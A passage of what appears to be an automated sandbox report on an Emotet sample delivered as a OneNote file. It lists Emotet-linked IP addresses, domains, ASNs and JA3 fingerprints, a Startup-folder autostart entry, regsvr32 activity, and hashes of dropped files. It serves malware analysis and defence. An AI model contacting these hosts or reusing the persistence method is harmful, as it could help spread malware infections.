                                  • Quality standard deviation: 31.3%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 22
                                  • Number of non-executed functions: 230

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 52.109.88.191, 20.126.106.131, 20.224.224.21, 13.107.4.50
                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, prod-w.nexus.live.com.akadns.net, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, nexus.officeapps.live.com, ctldl.windowsupdate.com, officeclient.microsoft.com, wu-bg-shim.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtCreateFile calls found.
                                  • Report size getting too big, too many NtOpenFile calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                  • Report size getting too big, too many NtReadFile calls found.
                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                  • Report size getting too big, too many NtWriteFile calls found.
                                  • VT rate limit hit for: malware.one

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  13:33:48AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk
                                  13:34:11API Interceptor2x Sleep call for process: wscript.exe modified
                                  13:34:50API Interceptor4x Sleep call for process: regsvr32.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  193.194.92.175click.wsfGet hashmaliciousEmotetBrowse
                                    Ysg66QDbRt.dllGet hashmaliciousEmotetBrowse
                                      WIFhAJKfNY.dllGet hashmaliciousEmotetBrowse
                                        untitled_764875647.oneGet hashmaliciousEmotetBrowse
                                          click.wsfGet hashmaliciousEmotetBrowse
                                            62245_20896.oneGet hashmaliciousEmotetBrowse
                                              93.84.115.205click.wsfGet hashmaliciousEmotetBrowse
                                                Ysg66QDbRt.dllGet hashmaliciousEmotetBrowse
                                                  WIFhAJKfNY.dllGet hashmaliciousEmotetBrowse
                                                    untitled_764875647.oneGet hashmaliciousEmotetBrowse
                                                      click.wsfGet hashmaliciousEmotetBrowse
                                                        62245_20896.oneGet hashmaliciousEmotetBrowse
                                                          174.138.33.49Ysg66QDbRt.dllGet hashmaliciousEmotetBrowse
                                                            file.dllGet hashmaliciousEmotetBrowse
                                                              N0pq5eqonB.dllGet hashmaliciousEmotetBrowse
                                                                N0pq5eqonB.dllGet hashmaliciousEmotetBrowse
                                                                  kOiaWLNKXpjayWeM.dllGet hashmaliciousEmotetBrowse
                                                                    UC2DFXQIBiE2kQ.dllGet hashmaliciousEmotetBrowse
                                                                      UC2DFXQIBiE2kQ.dllGet hashmaliciousEmotetBrowse
                                                                        UC2DFXQIBiE2kQ.dllGet hashmaliciousEmotetBrowse
                                                                          UC2DFXQIBiE2kQ.dllGet hashmaliciousEmotetBrowse
                                                                            Untitled-09112022.xlsGet hashmaliciousHidden Macro 4.0, EmotetBrowse
                                                                              4470_02112022.xlsGet hashmaliciousHidden Macro 4.0, EmotetBrowse
                                                                                4470_02112022.xlsGet hashmaliciousHidden Macro 4.0, EmotetBrowse
                                                                                  DVvzRulsoR.dllGet hashmaliciousEmotetBrowse
                                                                                    jYzNEOocXJ.dllGet hashmaliciousEmotetBrowse
                                                                                      DVvzRulsoR.dllGet hashmaliciousEmotetBrowse
                                                                                        BiiRGnhWx8.dllGet hashmaliciousEmotetBrowse
                                                                                          jYzNEOocXJ.dllGet hashmaliciousEmotetBrowse
                                                                                            BiiRGnhWx8.dllGet hashmaliciousEmotetBrowse
                                                                                              gdazhx1EIP.dllGet hashmaliciousEmotetBrowse
                                                                                                UNUy8dUYWp.dllGet hashmaliciousEmotetBrowse

                                                                                                  Domains

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  kts.groupclick.wsfGet hashmaliciousEmotetBrowse
                                                                                                  • 31.31.196.93
                                                                                                  untitled_764875647.oneGet hashmaliciousEmotetBrowse
                                                                                                  • 31.31.196.93
                                                                                                  click.wsfGet hashmaliciousEmotetBrowse
                                                                                                  • 31.31.196.93
                                                                                                  62245_20896.oneGet hashmaliciousEmotetBrowse
                                                                                                  • 31.31.196.93
                                                                                                  malli.suclick.wsfGet hashmaliciousEmotetBrowse
                                                                                                  • 195.2.88.86
                                                                                                  untitled_764875647.oneGet hashmaliciousEmotetBrowse
                                                                                                  • 195.2.88.86
                                                                                                  click.wsfGet hashmaliciousEmotetBrowse
                                                                                                  • 195.2.88.86
                                                                                                  62245_20896.oneGet hashmaliciousEmotetBrowse
                                                                                                  • 195.2.88.86
                                                                                                  c-0001.c-msedge.netPDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exeGet hashmaliciousVector StealerBrowse
                                                                                                  • 13.107.4.50
                                                                                                  F4cejyW26j.exeGet hashmaliciousCryptbotBrowse
                                                                                                  • 13.107.4.50
                                                                                                  zBIcYCy6Yc.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                  • 13.107.4.50
                                                                                                  UCo4WlAyi1.exeGet hashmaliciousDanaBotBrowse
                                                                                                  • 13.107.4.50
                                                                                                  setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                  • 13.107.4.50
                                                                                                  setup.exeGet hashmaliciousDjvuBrowse
                                                                                                  • 13.107.4.50
                                                                                                  E8DQP4nJIj.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                  • 13.107.4.50
                                                                                                  O2td3C72ni.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                  • 13.107.4.50
                                                                                                  f_00321b.dllGet hashmaliciousEmotetBrowse
                                                                                                  • 13.107.4.50
                                                                                                  https://www.dropbox.com/scl/fi/1nqyu0mxlcuol77cvuzhq/Please-kindly-preview-the-paper-document-below..paper?dl=0&rlkey=px6p30z2du1tnve24vqyow1seGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 13.107.4.50
                                                                                                  http://13.107.4.50Get hashmaliciousUnknownBrowse
                                                                                                  • 13.107.4.50
                                                                                                  DISCOUNT_PRICES.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                  • 13.107.4.50
                                                                                                  New_Order.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  • 13.107.4.50
                                                                                                  https://midcoastsupplies.com.auGet hashmaliciousUnknownBrowse
                                                                                                  • 13.107.4.50
                                                                                                  DHL_Original_Document.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  • 13.107.4.50
                                                                                                  Insight_Medical_Publishing.oneGet hashmaliciousEmotetBrowse
                                                                                                  • 13.107.4.50
                                                                                                  Omics_Journal.oneGet hashmaliciousEmotetBrowse
                                                                                                  • 13.107.4.50
                                                                                                  PurchaseOrder-pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  • 13.107.4.50
                                                                                                  WIFhAJKfNY.dllGet hashmaliciousEmotetBrowse
                                                                                                  • 13.107.4.50
                                                                                                  NG7553084292252526_202303161746.oneGet hashmaliciousEmotetBrowse
                                                                                                  • 13.107.4.50

                                                                                                  ASNs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  ARNDZclick.wsfGet hashmaliciousEmotetBrowse
                                                                                                  • 193.194.92.175
                                                                                                  Ysg66QDbRt.dllGet hashmaliciousEmotetBrowse
                                                                                                  • 193.194.92.175
                                                                                                  WIFhAJKfNY.dllGet hashmaliciousEmotetBrowse
                                                                                                  • 193.194.92.175
                                                                                                  untitled_764875647.oneGet hashmaliciousEmotetBrowse
                                                                                                  • 193.194.92.175
                                                                                                  click.wsfGet hashmaliciousEmotetBrowse
                                                                                                  • 193.194.92.175
                                                                                                  62245_20896.oneGet hashmaliciousEmotetBrowse
                                                                                                  • 193.194.92.175
                                                                                                  DAt4GrtqhjGet hashmaliciousUnknownBrowse
                                                                                                  • 193.194.64.14
                                                                                                  i586-20220323-1338Get hashmaliciousMirai MoobotBrowse
                                                                                                  • 193.194.64.27
                                                                                                  arm7Get hashmaliciousUnknownBrowse
                                                                                                  • 193.194.88.51
                                                                                                  z0x3n.armGet hashmaliciousGafgyt MiraiBrowse
                                                                                                  • 193.194.88.33
                                                                                                  BELPAK-ASBELPAKBYclick.wsfGet hashmaliciousEmotetBrowse
                                                                                                  • 93.84.115.205
                                                                                                  Ysg66QDbRt.dllGet hashmaliciousEmotetBrowse
                                                                                                  • 93.84.115.205
                                                                                                  WIFhAJKfNY.dllGet hashmaliciousEmotetBrowse
                                                                                                  • 93.84.115.205
                                                                                                  untitled_764875647.oneGet hashmaliciousEmotetBrowse
                                                                                                  • 93.84.115.205
                                                                                                  click.wsfGet hashmaliciousEmotetBrowse
                                                                                                  • 93.84.115.205
                                                                                                  62245_20896.oneGet hashmaliciousEmotetBrowse
                                                                                                  • 93.84.115.205
                                                                                                  OS6UA0Oqz4.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 86.57.163.231
                                                                                                  CBPQ62L5NY.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                  • 178.120.4.193
                                                                                                  UrQrIdRfCg.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 178.124.170.112
                                                                                                  rih4uw6saZ.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 178.124.235.152
                                                                                                  zFDrbFVMDM.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                  • 178.120.164.244
                                                                                                  sora.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 86.57.221.28
                                                                                                  I2pbsfUghs.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 93.85.1.224
                                                                                                  mHLirbAPiA.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 178.127.50.190
                                                                                                  0P5NsYEs43.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 178.121.106.236
                                                                                                  fdf2SzzeIg.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 93.84.174.34
                                                                                                  Xhz4I1ULKf.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 194.226.121.140
                                                                                                  aByOA3pL8y.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                  • 178.120.254.62
                                                                                                  kwari.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 37.212.246.149
                                                                                                  ujANHMCT2q.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 178.123.110.214

                                                                                                  JA3 Fingerprints

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  ce5f3254611a8c095a3d821d44539877setup.exeGet hashmaliciousAmadey, Clipboard Hijacker, Djvu, Fabookie, RHADAMANTHYS, SmokeLoaderBrowse
                                                                                                  • 31.31.196.93
                                                                                                  • 40.115.116.248
                                                                                                  setup.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                                                                                                  • 31.31.196.93
                                                                                                  • 40.115.116.248
                                                                                                  setup.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, VidarBrowse
                                                                                                  • 31.31.196.93
                                                                                                  • 40.115.116.248
                                                                                                  setup.exeGet hashmaliciousAmadey, Djvu, Fabookie, RHADAMANTHYS, RedLine, SmokeLoader, VidarBrowse
                                                                                                  • 31.31.196.93
                                                                                                  • 40.115.116.248
                                                                                                  setup.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                                                                  • 31.31.196.93
                                                                                                  • 40.115.116.248
                                                                                                  setup.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, RedLine, SmokeLoader, VidarBrowse
                                                                                                  • 31.31.196.93
                                                                                                  • 40.115.116.248
                                                                                                  setup.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                                                                  • 31.31.196.93
                                                                                                  • 40.115.116.248
                                                                                                  8846_0.oneGet hashmaliciousEmotetBrowse
                                                                                                  • 31.31.196.93
                                                                                                  • 40.115.116.248
                                                                                                  file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                  • 31.31.196.93
                                                                                                  • 40.115.116.248
                                                                                                  OYm3R777Yb.exeGet hashmaliciousAmadey, Babuk, Djvu, Fabookie, Raccoon Stealer v2, RedLine, SmokeLoaderBrowse
                                                                                                  • 31.31.196.93
                                                                                                  • 40.115.116.248
                                                                                                  r7icIGgp7u.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, RedLine, SmokeLoader, VidarBrowse
                                                                                                  • 31.31.196.93
                                                                                                  • 40.115.116.248
                                                                                                  setup.exeGet hashmaliciousAmadey, Babuk, Djvu, RedLine, SmokeLoader, VidarBrowse
                                                                                                  • 31.31.196.93
                                                                                                  • 40.115.116.248
                                                                                                  setup.exeGet hashmaliciousAmadey, Babuk, Djvu, Fabookie, RedLine, SmokeLoader, VidarBrowse
                                                                                                  • 31.31.196.93
                                                                                                  • 40.115.116.248
                                                                                                  setup.exeGet hashmaliciousAmadey, Djvu, Fabookie, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                                                                  • 31.31.196.93
                                                                                                  • 40.115.116.248
                                                                                                  setup.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                                                                  • 31.31.196.93
                                                                                                  • 40.115.116.248
                                                                                                  setup.exeGet hashmaliciousAmadey, Djvu, SmokeLoaderBrowse
                                                                                                  • 31.31.196.93
                                                                                                  • 40.115.116.248
                                                                                                  setup.exeGet hashmaliciousAmadey, Djvu, Fabookie, RHADAMANTHYS, SmokeLoaderBrowse
                                                                                                  • 31.31.196.93
                                                                                                  • 40.115.116.248
                                                                                                  tvfratt.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, VidarBrowse
                                                                                                  • 31.31.196.93
                                                                                                  • 40.115.116.248
                                                                                                  sj6SYjQHo0.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, RHADAMANTHYS, SmokeLoaderBrowse
                                                                                                  • 31.31.196.93
                                                                                                  • 40.115.116.248
                                                                                                  2QF0HzvFfv.exeGet hashmaliciousAmadey, Djvu, Fabookie, SmokeLoaderBrowse
                                                                                                  • 31.31.196.93
                                                                                                  • 40.115.116.248

                                                                                                  Dropped Files

                                                                                                  No context

                                                                                                  Created / dropped Files

                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\regsvr32.exe
                                                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 62582 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                  Category:dropped
                                                                                                  Size (bytes):62582
                                                                                                  Entropy (8bit):7.996063107774368
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:1536:Jk3XPi43VgGp0gB2itudTSRAn/TWTdWftu:CHa43V5p022iZ4CgA
                                                                                                  MD5:E71C8443AE0BC2E282C73FAEAD0A6DD3
                                                                                                  SHA1:0C110C1B01E68EDFACAEAE64781A37B1995FA94B
                                                                                                  SHA-256:95B0A5ACC5BF70D3ABDFD091D0C9F9063AA4FDE65BD34DBF16786082E1992E72
                                                                                                  SHA-512:B38458C7FA2825AFB72794F374827403D5946B1132E136A0CE075DFD351277CF7D957C88DC8A1E4ADC3BCAE1FA8010DAE3831E268E910D517691DE24326391A6
                                                                                                  Malicious:false
                                                                                                  Preview:MSCF....v.......,...................I.................BVrl .authroot.stl....oJ5..CK..8U....a..3.1.P. J.".t..2F2e.dHH......$E.KB.2D..-SJE....^..'..y.}..,{m.....\...]4.G.......h....148...e.gr.....48:.L...g.....Xef.x:..t...J...6-....kW6Z>....&......ye.U.Q&z:.vZ..._....a...]..T.E.....B.h.,...[....V.O.3..EW.x.?.Q..$.@.W..=.B.f..8a.Y.JK..g./%p..C.4CD.s..Jd.u..@.g=...a.. .h%..'.xjy7.E..\.....A..':.4TdW?Ko3$.Hg.z.d~....../q..C.....`...A[ W(.........9...GZ.;....l&?........F...p?... .p.....{S.L4..v.+...7.T?.....p..`..&..9.......f...0+.L.....1.2b)..vX5L'.~....2vz.,E.Ni.{#...o..w.?.#.3..h.v<.S%.].tD@!Le.w.q.7.8....QW.FT.....hE.........Y............./.%Q...k...*.Y.n..v.A..../...>B..5\..-Ko.......O<.b.K.{.O.b...._.7...4.;%9N..K.X>......kg-9..r.c.g.G|.*[.-...HT...",?.q...ad....7RE.......!f..#../....?.-.^.K.c^...+{.g......]<..$.=.O....ii7.wJ+S..Z..d.....>..J*...T..Q7..`.r,<$....\d:K`..T.n....N.....C..j.;.1SX..j....1...R....+....Yg....]....3..9..S..D..`.

                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\regsvr32.exe
                                                                                                  File Type:data
                                                                                                  Category:modified
                                                                                                  Size (bytes):328
                                                                                                  Entropy (8bit):3.110837479881124
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:kKlAAry/7UN+SkQlPlEGYRMY9z+4KlDA3RUecZUt:JCvkPlE99SNxAhUext
                                                                                                  MD5:B382B63E355A94F9858E5B2B358E97A9
                                                                                                  SHA1:4809ACEF83D520EEA515162B05A52C3417752B49
                                                                                                  SHA-256:C6F9D731F3E1F52E924FB59741313C99E629067550A0A9001D602F7A684B1A1D
                                                                                                  SHA-512:686852AA263CE017FF812B121A0E391F99D491F2810371CA08D23E8563065AC24E7E0704948FF431A44444AF7012C8C2B8BD3D30AAF7E75BBB1452CD3F42E51E
                                                                                                  Malicious:false
                                                                                                  Preview:p...... ........2-.dk[..(....................................................... ..........).K......&...........v...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.2.f.9.2.9.a.7.4.b.d.9.1.:.0."...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\C41609EF-1ECD-4EEF-916A-7808B4AAB9B7

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):154907
                                                                                                  Entropy (8bit):5.352011512322313
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:J+C76gfYBIB9guw6LQ9DQl+zQxik4F77nXmvidlXRpE6Lhz67:4cQ9DQl+zrXgb
                                                                                                  MD5:E673D9934734A836E871EC298C700859
                                                                                                  SHA1:2BC4788E9D068A6B04DFA5A1EB7F2C86384B07F8
                                                                                                  SHA-256:4B21A2AA4ECDE1423635F3671C23A273F698A2D677342C3E980100E7065B4452
                                                                                                  SHA-512:8C247A4E227C9B19B00184D406E3550D377FC09DCA971285558B078C7037D0D8C93BE633221C7B8E72BD66B19BDA1123795E1BF7BE72DEB6F9907B50A54FB233
                                                                                                  Malicious:false
                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2023-03-20T12:33:09">.. Build: 16.0.16310.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.ResourceId]" o:authorityUrl="[ADALAuthorityU

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3679
                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2232
                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13084
                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                  Malicious:false
